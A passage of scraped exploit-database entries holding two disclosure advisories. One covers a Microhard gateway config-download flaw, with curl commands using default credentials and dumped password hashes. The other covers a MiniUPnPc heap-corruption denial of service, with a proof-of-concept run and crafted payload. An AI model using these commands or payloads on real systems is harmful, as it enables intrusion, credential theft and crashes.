applications", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30738", "href": "https://0day.today/exploit/description/30738", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download Vulnerability", "type": "zdt", "sourceData": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download\r\n \r\n \r\nVendor: Microhard Systems Inc.\r\nProduct web page: http://www.microhardcorp.com\r\nAffected version: IPn4G 1.1.0 build 1098\r\n IPn3Gb 2.2.0 build 2160\r\n IPn4Gb 1.1.6 build 1184-14\r\n IPn4Gb 1.1.0 Rev 2 build 1090-2\r\n IPn4Gb 1.1.0 Rev 2 build 1086\r\n Bullet-3G 1.2.0 Rev A build 1032\r\n VIP4Gb 1.1.6 build 1204\r\n VIP4G 1.1.6 Rev 3.0 build 1184-14\r\n VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196\r\n IPn3Gii / Bullet-3G 1.2.0 build 1076\r\n IPn4Gii / Bullet-LTE 1.2.0 build 1078\r\n BulletPlus 1.3.0 build 1036\r\n Dragon-LTE 1.1.0 build 1036\r\n \r\nSummary: The new IPn4Gb provides a rugged, industrial strength wireless solution\r\nusing the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb\r\nfeatures integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control\r\nLists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial\r\nRS232/485/422 devices!\r\n \r\nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses\r\nthe widespread deployment of cellular network infrastructure for critical data collection.\r\nFrom remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!\r\nThe IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It\r\nprovides robust and secure wireless communication of Serial, USB and Ethernet data.\r\n \r\nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength\r\nwireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things\r\nto the next level by providing features such as Ethernet with PoE, RS232 Serial port\r\nand 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated\r\nFirewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution\r\nworth looking at!\r\n \r\nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength\r\nwireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote\r\ncellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight\r\nsystem integration and design flexibility with dual Ethernet Ports and high power\r\n802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access\r\nControl Lists, the Dragon-LTE provides a solution for any cellular application!\r\n \r\nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE\r\nnetwork infrastructure for critical data communications. The VIP4Gb provides simultaneous\r\nnetwork connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital\r\nI/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in\r\nany application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.\r\nIt provides robust and secure wireless communication of Serial, Ethernet & WiFi data.\r\n \r\nDesc: The system backup configuration file 'IPn4G.config' in '/' directory or its respective\r\nname based on the model name including the similar files in '/www/cgi-bin/system.conf', '/tmp'\r\nand the cli.conf in '/etc/m_cli/' can be downloaded by an authenticated attacker in certain\r\ncircumstances. This will enable the attacker to disclose sensitive information and help her\r\nin authentication bypass, privilege escalation and/or full system access.\r\n \r\nTested on: httpd-ssl-1.0.0\r\n Linux 2.6.32.9 ([email\u00a0protected]) (gcc version 4.4.3)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2018-5484\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5484.php\r\n \r\n \r\n13.03.2018\r\n \r\n--\r\n \r\n \r\n/etc/m_cli/cli.conf:\r\n--------------------\r\n \r\ncurl \"http://192.168.1.1/cgi-bin/webif/download.sh?script=/cgi-bin/webif/system-editor.sh&path=/etc/m_cli&savefile=cli.conf\" -H \"Authorization: Basic YWRtaW46YWRtaW4=\" |grep passwd\r\n % Total % Received % Xferd Average Speed Time Time Time Current\r\n Dload Upload Total Spent Left Speed\r\n100 2719 100 2719 0 0 2574 0 0:00:01 0:00:01 --:--:-- 2577\r\npasswd admin \r\n \r\n \r\n/www/IPn4G.config:\r\n------------------\r\n \r\n[email\u00a0protected]:~$ curl http://192.168.1.1/IPn4G.config -o IPn4G.tar.gz -H \"Authorization: Basic YWRtaW46YWRtaW4=\"\r\n % Total % Received % Xferd Average Speed Time Time Time Current\r\n Dload Upload Total Spent Left Speed\r\n100 13156 100 13156 0 0 9510 0 0:00:01 0:00:01 --:--:-- 9512\r\n[email\u00a0protected]:~$ tar -zxf IPn4G.tar.gz ; ls\r\nconfig.boardinfo config.boardtype config.date config.name etc IPn4G.tar.gz usr\r\n[email\u00a0protected]:~$ cat config.boardinfo config.boardtype config.date config.name \r\n2012 Microhard Systems Inc.:IPn4Gb-IPn4G:v1.0.0\r\nAtheros AR7130 rev 2\r\nThu Jul 12 12:42:42 PDT 2018\r\nIPn4G\r\n[email\u00a0protected]:~$ cat usr/lib/hardware_desc \r\nmodem_type=\"N930\"\r\nLTE_ATCOMMAND_PORT=\"/dev/ttyACM0\"\r\nLTE_DIAG_PORT=\"\"\r\nLTE_GPS_PORT=\"\"\r\nwificard = \"0\"\r\n[email\u00a0protected]:~$ ls etc/\r\nconfig crontabs dropbear ethers firewall.user hosts httpd.conf passwd ssl\r\n[email\u00a0protected]:~$ ls etc/config/\r\ncomport dhcp gpsgatetr iperf modbusd notes sdpServer twatchdog webif_access_control\r\ncomport2 dropbear gpsr ipsec msmscomd ntpclient snmpd updatedd websockserver\r\ncoova-chilli ethernet gpsrecorderd keepalive msshc ntrd snmpd.conf vlan wireless\r\ncron eurd gre-tunnels localmonitor network pimd system vnstat wsclient\r\ncrontabs firewall httpd lte network_IPnVTn3G ping timezone vpnc\r\ndatausemonitor gpsd ioports lte362 network_VIP4G salertd tmpstatus webif\r\n[email\u00a0protected]:~$ cat etc/passwd \r\nroot:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash\r\nadmin:$1$0VKXa1iD$.Jw20V3iH3kx6VSLjsFZP.:0:0:admin:/:/etc/m_cli/m_cli.sh\r\nupgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false\r\nat:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI\r\nnobody:*:65534:65534:nobody:/var:/bin/false\r\ntestlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh\r\ntestlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh\r\ntestingus:$1$S9c8yiFq$P96OckXNQMhpKjFoRx1sL.:1000:1000:Linux User,,,:/home/testingus:/bin/false\r\nmsshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh\r\n \r\n \r\n/www/cgi-bin/system.conf:\r\n-------------------------\r\n \r\n[email\u00a0protected]:~$ curl -O http://192.168.1.1/cgi-bin/system.conf -H \"Authorization: Basic YWRtaW46YWRtaW4=\"\r\n[email\u00a0protected]:~$ cat system.conf |grep -irnH \"password\" -A2\r\nsystem.conf:236:#VPN Admin Password:\r\nsystem.conf-237-NetWork_IP_VPN_Passwd=admin\r\nsystem.conf-238-\r\n--\r\nsystem.conf:309:#V3 Authentication Password:\r\nsystem.conf:310:NetWork_SNMP_V3_Auth_Password=00000000\r\nsystem.conf-311-\r\nsystem.conf:312:#V3 Privacy Password:\r\nsystem.conf:313:NetWork_SNMP_V3_Privacy_Password=00000000\r\n \r\n \r\nLogin to FTP (upgrade:admin). In /tmp/ or /tmp/upgrade/ the system.conf (gzipped) is located.\r\n---------------------------------------------------------------------------------------------\n\n# 0day.today [2018-07-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30738"}, {"lastseen": "2018-03-31T15:41:34", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2018-01-11T00:00:00", "published": "2018-01-11T00:00:00", "href": "https://0day.today/exploit/description/29439", "id": "1337DAY-ID-29439", "type": "zdt", "title": "MiniUPnP MiniUPnPc < 2.0 - Remote Denial of Service Vulnerability", "sourceData": "VuNote\r\n======\r\n \r\n Author: <github.com/tintinweb>\r\n Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-8798\r\n Version: 0.6\r\n Date: May 1st, 2017\r\n \r\n Tag: miniupnpc getHTTPResponse chunked encoding integer signedness error\r\n \r\nOverview\r\n--------\r\n \r\n Name: miniupnpc\r\n Vendor: Thomas Bernard\r\n References: * http://miniupnp.free.fr/ [1]\r\n \r\n Version: v2.0 [2]\r\n Latest Version: v2.0.20170421 [2][3]\r\n Other Versions: >= v1.4.20101221 [2] (released 21/12/2010; ~6 years ago)\r\n Platform(s): cross\r\n Technology: c\r\n \r\n Vuln Classes: CWE-196, CWE-190\r\n Origin: remote\r\n Min. Privs.: ---\r\n \r\n CVE: CVE-2017-8798\r\n \r\n \r\nDescription\r\n---------\r\n \r\nquote website [1]\r\n \r\n>UPnP IGD client lightweight library and UPnP IGD daemon\r\n>The UPnP protocol is supported by most home adsl/cable routers and Microsoft Windows 2K/XP. The aim of the MiniUPnP project is to bring a free software solution to support the \"Internet Gateway Device\" part of the protocol. The MediaServer/MediaRenderer UPnP protocol (DLNA) is also becoming very popular but here we are talking about IGD. ReadyMedia (formely known as MiniDLNA) is a UPnP Media Server using some UPnP code from MiniUPnPd.\r\n \r\nminiupnp is part of many applications and embedded network devices\r\n \r\n* P2P File Sharing software - e.g. qBittorrent\r\n* Network Device Firmware\r\n* Blockchain clients - e.g. EthereumCPP, bitcoind and forked coins\r\n \r\n \r\nSummary\r\n-------\r\n \r\n*TL;DR - one-click crash miniupnpc based applications on your network*\r\n \r\n#### Integer signedness error in miniupnpc allows remote attackers to\r\ncause a denial of service condition via specially crafted HTTP response\r\n \r\nAn integer signedness error was found in miniupnp's `miniwget` allowing\r\nan unauthenticated remote entity typically located on the\r\nlocal network segment to trigger a heap corruption or an access violation\r\nin miniupnp's http response parser when processing a specially crafted\r\nchunked-encoded response to a request for the xml root description url.\r\n \r\nTo exploit this vulnerability, an attacker only has to provide a\r\nchunked-encode HTTP response with a negative chunk length to upnp\r\nclients requesting a resource on the attackers webserver. Upnp clients\r\ncan easily be instructed to request resources on the attackers webserver\r\nby answering SSDP discovery request or by issueing SSDP service\r\nnotifications (low complexity, integral part of the protocol).\r\n \r\n \r\n* remote, unauthenticated, `ACCESS_VIOLATION_READ` and heap corruption\r\n* (confirmed) DoS; (unconfirmed) could also lead to RCE under certain\r\ncircumstances (multi-threaded?)\r\n \r\n \r\nsee attached PoC\r\nsee proposed patch\r\n \r\nDetails\r\n-------\r\n \r\nThe vulnerable component is a HTTP file download method called\r\n`miniwget` (precisely `getHTTPResponse`) that fails to properly handle\r\ninvalid chunked-encoded HTTP responses. The root cause is a bounds check\r\nthat mistakenly casts an unsigned attacker-provided chunksize to signed\r\nint leading to an incorrect decision on the destination heap buffer size\r\nwhen copying data from the server response to an internal buffer. The\r\nattacker controls both the size of the internal buffer as well as the\r\nnumber of bytes to copy. In order for this attack to succeed, the number\r\nof bytes to copy must be negative.\r\n \r\nattacker controls:\r\n* `int content_length`\r\n* `unsigned int chunksize`\r\n* `bytestocopy` if `(int) chunksize` is negative (or at least < `n-i` ~ 1900 bytes)\r\n* length of `content_buf` if `bytestocopy` is negative\r\n \r\nIn the end, the attacker controls\r\n* `realloc(content_buf, content_length)`\r\n* `memcpy(content_buf+x, http_response, chunksize)`\r\n \r\n \r\n client (miniupnpc) server (poc.py)\r\n | |\r\n | |\r\n | SSDP: Discovery - M-SEARCH |\r\n 1. | --------------------------------------> |\r\n | |\r\n | SSDP: Reply - Location Header |\r\n 2. | <-------------------------------------- |\r\n | |\r\n | SCPD: GET (Location Header/xxxx.xml) |\r\n 3. | --------------------------------------> |\r\n | |\r\n | SCPD: HTTP chunked-encoded reply |\r\n 4. | <-------------------------------------- |\r\n | |\r\n \r\n1. application performs SSDP discovery via M-SEARCH (multicast, local network segment)\r\n2. poc.py responds with the url to the xml root description requesting the application to navigate to the malicious webserver.\r\n3. application requests xml root description url (taken from reply to M-SEARCH, Location Header) on malicious webserver (poc.py)\r\n4. poc.py responds with a specially crafted http response triggering the heap overwrite in miniupnp\r\n \r\n#### Source\r\n \r\n`miniwget.c:236` [4]\r\n \r\n*Note:* Inline annotations are prefixed with //#!\r\n \r\n* A) 1. to 3. is the parsing of the chunksize\r\n* B) 4. to 5. integer signedness error\r\n* C) 6. integer wrapping\r\n* D) 7. to 9. destination buffer size\r\n* E) 10. heap overwrite with size in bytestocopy\r\n \r\n \r\n```c\r\n/* content */\r\nif(chunked) //#! 1) transfer-encoding: chunked\r\n{\r\n int i = 0;\r\n while(i < n)\r\n {\r\n if(chunksize == 0)\r\n {\r\n /* reading chunk size */\r\n if(chunksize_buf_index == 0) {\r\n /* skipping any leading CR LF */\r\n if(i<n && buf[i] == '\\r') i++;\r\n if(i<n && buf[i] == '\\n') i++;\r\n }\r\n while(i<n && isxdigit(buf[i]) //#! 2) copy hexchars to chunksize_buf\r\n && chunksize_buf_index < (sizeof(chunksize_buf)-1))\r\n {\r\n chunksize_buf[chunksize_buf_index++] = buf[i];\r\n chunksize_buf[chunksize_buf_index] = '\\0';\r\n i++;\r\n }\r\n while(i<n && buf[i] != '\\r' && buf[i] != '\\n')\r\n i++; /* discarding chunk-extension */\r\n if(i<n && buf[i] == '\\r') i++;\r\n if(i<n && buf[i] == '\\n') {\r\n unsigned int j;\r\n for(j = 0; j < chunksize_buf_index; j++) { //#! 3) hexint chunksize = atoi(chunksize_buf)\r\n if(chunksize_buf[j] >= '0'\r\n && chunksize_buf[j] <= '9')\r\n chunksize = (chunksize << 4) + (chunksize_buf[j] - '0');\r\n else\r\n chunksize = (chunksize << 4) + ((chunksize_buf[j] | 32) - 'a' + 10);\r\n }\r\n chunksize_buf[0] = '\\0';\r\n chunksize_buf_index = 0;\r\n i++;\r\n } else {\r\n /* not finished to get chunksize */\r\n continue;\r\n }\r\n#ifdef DEBUG\r\n printf(\"chunksize = %u (%x)\\n\", chunksize, chunksize);\r\n#endif\r\n if(chunksize == 0)\r\n {\r\n#ifdef DEBUG\r\n printf(\"end of HTTP content - %d %d\\n\", i, n);\r\n /*printf(\"'%.*s'\\n\", n-i, buf+i);*/\r\n#endif\r\n goto end_of_stream;\r\n }\r\n }\r\n //#! 4)\r\n //#! goal: a) bytestocopy becomes negative due to chunksize being negative\r\n //#! b) content_length defines destination buffer size\r\n //#! c) overwrite destination heap buffer content_buf[content_length] with bytestocopy bytes from request\r\n //#! memcopy(content_buf[content_length], req_body, (unsigned)bytestocopy)\r\n //#!\r\n bytestocopy = ((int)chunksize < (n - i))?chunksize:(unsigned int)(n - i); //#! 5) boom! - bytestocopy becomes chunksize since chunksize is negative (e.g. -1)\r\n if((content_buf_used + bytestocopy) > content_buf_len) //#! 6) true, since bytestocopy is negative, wraps unsigned content_buf_used\r\n {\r\n char * tmp;\r\n if(content_length >= (int)(content_buf_used + bytestocopy)) { //#! 7) content_length is attacker controlled.\r\n content_buf_len = content_length; //#! 8) we want content_length to define our dst buffer size (e.g. 9000)\r\n } else { //#! if we dont hit this, content_buf_len would likely be ~2k\r\n content_buf_len = content_buf_used + bytestocopy;\r\n }\r\n tmp = realloc(content_buf, content_buf_len); //#! 9) realloc to content_length bytes (e.g. 9000)\r\n if(tmp == NULL) {\r\n /* memory allocation error */\r\n free(content_buf);\r\n free(header_buf);\r\n *size = -1;\r\n return NULL;\r\n }\r\n content_buf = tmp;\r\n }\r\n memcpy(content_buf + content_buf_used, buf + i, bytestocopy); //#! 10) boom heap overwrite with bytesttocopy bytes (e.g. (unsigned)-1) to content_length (e.g. 9000) sized buffer\r\n content_buf_used += bytestocopy; //#! (also an out of bounds ready since it has not been checked if buf holds enough bytes)\r\n i += bytestocopy;\r\n chunksize -= bytestocopy;\r\n }\r\n}\r\n```\r\n \r\n#### Taint Graph\r\n \r\n basically all `miniwget*` and `UPNP_*` methods.\r\n \r\n * getHTTPResponse (vulnerable)\r\n * miniwget3\r\n * miniwget2\r\n * miniwget\r\n * miniwget_getaddr\r\n * UPNP_GetIGDFromUrl\r\n * UPNP_GetValidIGD\r\n * UPnP_selectigd\r\n * UPNP_Get*\r\n * UPNP_Check*\r\n * UPNP_Delete*\r\n * UPNP_Update*\r\n * UPNP_Add*\r\n \r\n \r\n#### Scenarios\r\n \r\nThe PoC can be configured for three scenarios:\r\n \r\n##### 1) SCENARIO_CRASH_LARGE_MEMCPY\r\n \r\nSimilar to 3) attempts to smash the heap but likely fails with an\r\n`ACCESS_VIOLATION_READ` when trying to read from an non-accessible\r\nmemory region.\r\n \r\n (gdb) up\r\n #1 0x000000000040862c in getHTTPResponse ([email\u00a0protected]=3, [email\u00a0protected]=0x7fffffffd77c,\r\n [email\u00a0protected]=0x0) at miniwget.c:305\r\n 305 memcpy(content_buf + content_buf_used, buf + i, bytestocopy);\r\n (gdb) i lo\r\n i = 30\r\n buf = \"f\\r\\n<xml>BOOM</xml>\\r\\n80000000\\r\\n\", 'A' <repeats 2018 times>\r\n n = 1954\r\n endofheaders = 94\r\n chunked = 1\r\n content_length = 9041\r\n chunksize = 2147483648\r\n bytestocopy = 2147483648 //#! <--- nr of bytes to copy from buf\r\n header_buf = 0x60f010 \"HTTP/1.1 200 OK\\r\\nTransfer-Encoding: chunked\\r\\nContent-Length: 9041\\r\\nContent-Type: text/html\\r\\n\\r\\nf\\r\\n<xml>BOOM</xml>\\r\\n80000000\\r\\n\", 'A' <repeats 76 times>...\r\n header_buf_len = 2048\r\n header_buf_used = <optimized out>\r\n content_buf = 0x60f820 \"<xml>BOOM</xml>\", 'A' <repeats 16 times>\r\n content_buf_len = 9041 //#! <--- dst buffer size\r\n content_buf_used = 15\r\n chunksize_buf = \"\\000\\060\\060\\060\\060\\060\\060\\060\\000\\313\\377\\377\\377\\177\\000\\000\\200\\[email\u00a0protected]\\000\\000\\000\\000\\000\\233\\[email\u00a0protected]\\000\\000\\000\\000\"\r\n chunksize_buf_index = 0\r\n reason_phrase = 0x0\r\n reason_phrase_len = 0\r\n \r\n##### 2) SCENARIO_CRASH_REALLOC_NULLPTR\r\n \r\nMiniupnp v1.8 was missing an error check for `realloc` which can\r\nbe used to cause a DoS condition when making `realloc` fail while\r\nallocating a large chunk of data. When `realloc` fails - because\r\nthe requested size of memory cannot be allocated - it returns a\r\n`nullptr`. Miniupnp ~1.8 was missing a check for the `nullptr`\r\nand tried to `memcpy` bytes from the attackers http response to\r\nthat `nullptr` which fails with an `ACCESS_VIOLATION`.\r\n \r\nTo achieve this scenario one must provide an arbitrarily large\r\n`content_length` (e.g. `0x7fffffff` likely fails on 32 bits) and\r\nmake `memcpy` attempt to copy a byte to that location.\r\n \r\n \r\n##### 3) SCENARIO_CRASH_1_BYTE_BUFFER\r\n \r\nThe idea is to create a small heap buffer and overwrite it with\r\na large chunk of data. This can be achieved by making instructing\r\nminiupnp to `realloc` `content_buf` to a size of `1 byte` by\r\nproviding a `content-length` of `1`. To overwrite this 1 byte\r\nbuffer the attacker provides a negative chunksize e.g.\r\n`0x80000000`. Depending on the implementation of `memcpy` and\r\nthe memory layout `memcpy` will either fail with a\r\n`ACCESS_VIOLATION_READ` as we're only providing <= 2048 bytes\r\nwith the server response and will most certainly hit a non-accessible\r\nmemory region while copying `0x80000000` bytes or the application\r\ncrashes because of a heap corruption.\r\n \r\nDiscussion: It could maybe possible for an upnp thread to corrupt\r\nthe heap, overwriting structures used by another thread to cause\r\ncode execution even before the application crashes when accessing\r\na non-accesible memory region.\r\n \r\n \r\nHere's an example of `miniupnpc` corrupting the heap when compiled\r\nfor 32 bit platforms.\r\n \r\n \r\n \u00e2\u00ba 0x80504de <getHTTPResponse+1912> call [email\u00a0protected] <0x8048a20>\r\n dest: 0x805981f \u00e2\u00e2 0x0 //#! <--- size 1 - attacker controlled content_buf\r\n src: 0xffffb77e \u00e2\u00e2 0x41414141 ('AAAA') //#! <--- attacker controlled http response\r\n n: 0x80000000 //#! <--- attacker controlled (must be negative) bytestocopy\r\n \r\n pwndbg> i lo\r\n i = 30\r\n buf = \"f\\r\\n<xml>BOOM</x\"...\r\n n = <optimized out>\r\n endofheaders = 91\r\n chunked = 1\r\n content_length = 1\r\n chunksize = 2147483648\r\n bytestocopy = 2147483648 //#! <--- nr of bytes to copy from buf\r\n header_buf = 0x8059008 \"HTTP/1.1 200 OK\"...\r\n header_buf_len = 2048\r\n header_buf_used = <optimized out>\r\n content_buf = 0x8059810 \"<xml>BOOM</x\\351\\a\\002\"\r\n content_buf_len = 1 //#! <--- destination, realloc'd to 1\r\n content_buf_used = 15\r\n chunksize_buf = \"\\000\\060\\060\\060\\060\\060\\060\\060\\000\\267\\377\\377p12\"...\r\n chunksize_buf_index = <optimized out>\r\n reason_phrase = 0x0\r\n reason_phrase_len = 0\r\n \r\n //#! ### before memcpy\r\n pwndbg> hexdump content_buf 100\r\n +0000 0x8059810 3c 78 6d 6c 3e 42 4f 4f 4d 3c 2f 78 e9 07 02 00 \u00e2<xml\u00e2>BOO\u00e2M</x\u00e2....\u00e2\r\n +0010 0x8059820 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \u00e2....\u00e2....\u00e2....\u00e2....\u00e2\r\n ...\r\n +0060 0x8059870 00 00 00 00 \u00e2....\u00e2 \u00e2 \u00e2 \u00e2\r\n +0064 0x8059874\r\n \r\n //#! ### after memcpy\r\n pwndbg> hexdump content_buf 100\r\n +0000 0x8059810 3c 78 6d 6c 3e 42 4f 4f 4d 3c 2f 78 e9 07 02 41 \u00e2<xml\u00e2>BOO\u00e2M</x\u00e2...A\u00e2\r\n +0010 0x8059820 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 \u00e2AAAA\u00e2AAAA\u00e2AAAA\u00e2AAAA\u00e2\r\n ...\r\n +0060 0x8059870 41 41 41 41 \u00e2AAAA\u00e2 \u00e2 \u00e2 \u00e2\r\n +0064 0x8059874\r\n \r\n \r\n#### Impact analysis:\r\n \r\n* DoS - providing an overly large `content_length` may cause `realloc`\r\nto fail and return a `nullptr`. subsequently crashing due to `memcpy`\r\ntrying to copy to `nullptr`. Has been `fixed > v1.8`.\r\n* DoS / potential RCE - providing a correct `content_length` wont cause\r\n`realloc` to fail and `memcpy` will go on copying a large block of data\r\nto `content_buf`. Potential for RCE in multithreaded environments with\r\nthreads sharing the heap e.g. main thread doing things while upnp thread\r\noverwrites large portions of the heap. may result in random crashes but\r\nmight allow to corrupt neighboring heap chunks in a way to gain code\r\nexec.\r\n* DoS - providing `0x7fffffff` to content_length may fail due to `realloc`\r\nnot being able to allocate >2 GB heap space on certain platforms. If\r\nthat would succeed, an attacker could try to write `1+x` bytes past the\r\nreallocation when providing a chunksize of `0x80000000+x`. However, the\r\nattacker is not able to provide http response chunks >2048 bytes due to\r\nminiupnp reading responses in chunks of max 2048 therefore rendering a\r\nRCE scenario impossible turning it into a DoS condition with due to\r\n`ACCESS_VIOLATION_READ`.\r\n \r\n \r\nProof of Concept\r\n----------------\r\n \r\nPrerequisites:\r\n \r\n* any software that compiles with `miniupnpc` or calls\r\n`miniwget.c::miniwget()` - e.g. bitcoind (with -upnp)\r\n* `poc.py`, python 2.7, tested on windows and linux\r\n(disable firewall or allow inbound tcp:65000, udp:1900)\r\n \r\nUsage:\r\n \r\n```c\r\nusage: poc.py [options]\r\n \r\n example: poc.py --listen <your_local_ip>:65000 [--havoc | --target <ip> [<ip>..]]\r\n \r\n \r\n \r\noptional arguments:\r\n -h, --help show this help message and exit\r\n -q, --quiet be quiet [default: False]\r\n -l LISTEN, --listen LISTEN\r\n local httpserver listen ip:port. Note: 0.0.0.0:<port>\r\n is not allowed. This ip is being used in the SSDP\r\n response Location header.\r\n -u USN, --usn USN Unique Service Name.\r\n -t [TARGET [TARGET ...]], --target [TARGET [TARGET ...]]\r\n Specify a list of client-ips to attack. Use --havoc to\r\n attempt to crash all clients.\r\n -z, --havoc Attempt to attack all clients connecting to our http\r\n server. Use at your own risk.\r\n```\r\n \r\nrun PoC\r\n \r\n* local listen ip:port for the malicious web server: 192.168.2.104:65000 (your ip)\r\n* only attempt to crash client 192.168.2.113 (use --havoc instead of --target to disable whitelist)\r\n \r\n```python\r\n#> poc.py --listen <your_local_ip>:65000 --target 192.168.2.113\r\n \r\n[poc.py - main() ][ INFO]\r\n \r\n \r\n _ _ _____ _____ _____ _____\r\n / |/ | | | | _ | | | _ | ___ ___ _____ ___ ___ ___\r\n / // / | | | __| | | | __| _ _ _ | | . | | | . | _| -_|\r\n|_/|_/ |_____|__| |_|___|__| |_|_|_| |_|_|___| |_|_|_|___|_| |___\r\n \r\n //github.com/tintinweb\r\n \r\n \r\n [mode ] filter (targeting ['192.168.2.113'])\r\n [listen] 192.168.2.104:65000 (local http server listening ip)\r\n [usn ] uuid:deadface-dead-dead-dead-cafebabed00d::upnp:rootdevice\r\n \r\n[poc.py - main() ][ DEBUG] spawning webserver: <BadHttpServer bind=('192.168.2.104', 65000)>\r\n[poc.py - __init__() ][ DEBUG] [SSDP] bind: 0.0.0.0:1900\r\n[poc.py - listen() ][ INFO] [HTTP] bind 192.168.2.104:65000\r\n[poc.py - __init__() ][ DEBUG] [SSDP] add membership: UDP/239.255.255.250\r\n[poc.py - register_callback() ][ DEBUG] [SSDP] add callback for 'M-SEARCH' : <function handle_msearch at 0x027B9270>\r\n[poc.py - listen() ][ INFO] [HTTP] waiting for connection\r\n[poc.py - register_callback() ][ DEBUG] [SSDP] add callback for 'NOTIFY' : <function handle_notify at 0x027B9330>\r\n[poc.py - listen() ][ DEBUG] [SSDP] listening...\r\n[poc.py - listen() ][ INFO] [ ] connection from: ('192.168.2.113', 43810)\r\n[poc.py - listen() ][ DEBUG] GET /xxxx.xml HTTP/1.1\r\nHost: 192.168.2.104:65000\r\nConnection: Close\r\nUser-Agent: CentOS/7.2.1511, UPnP/1.1, MiniUPnPc/2.0\r\n \r\n \r\n[poc.py - send() ][ DEBUG] HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\nContent-Length: 9041\r\nContent-Type: text/html\r\n \r\nf\r\n<xml>BOOM</xml>\r\n80000000\r\nAAAAAAAAAAAAAAAA... //#! Repeated 9k times.\r\n3\r\nbye\r\n0\r\n[poc.py - send() ][ WARNING] [----->] BOOM! payload delivered! - [to:('192.168.2.113', 43810)] <HttpLikeMessage msg=('HTTP/1.1', '200', 'OK') header={'Transfer-Encoding': 'chunked', 'Content-Length': 9041, 'Content-Type': 'text/html'} body='f\\r\\n<xml>BOOM</xml>\\r\\n80000000\\r\\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA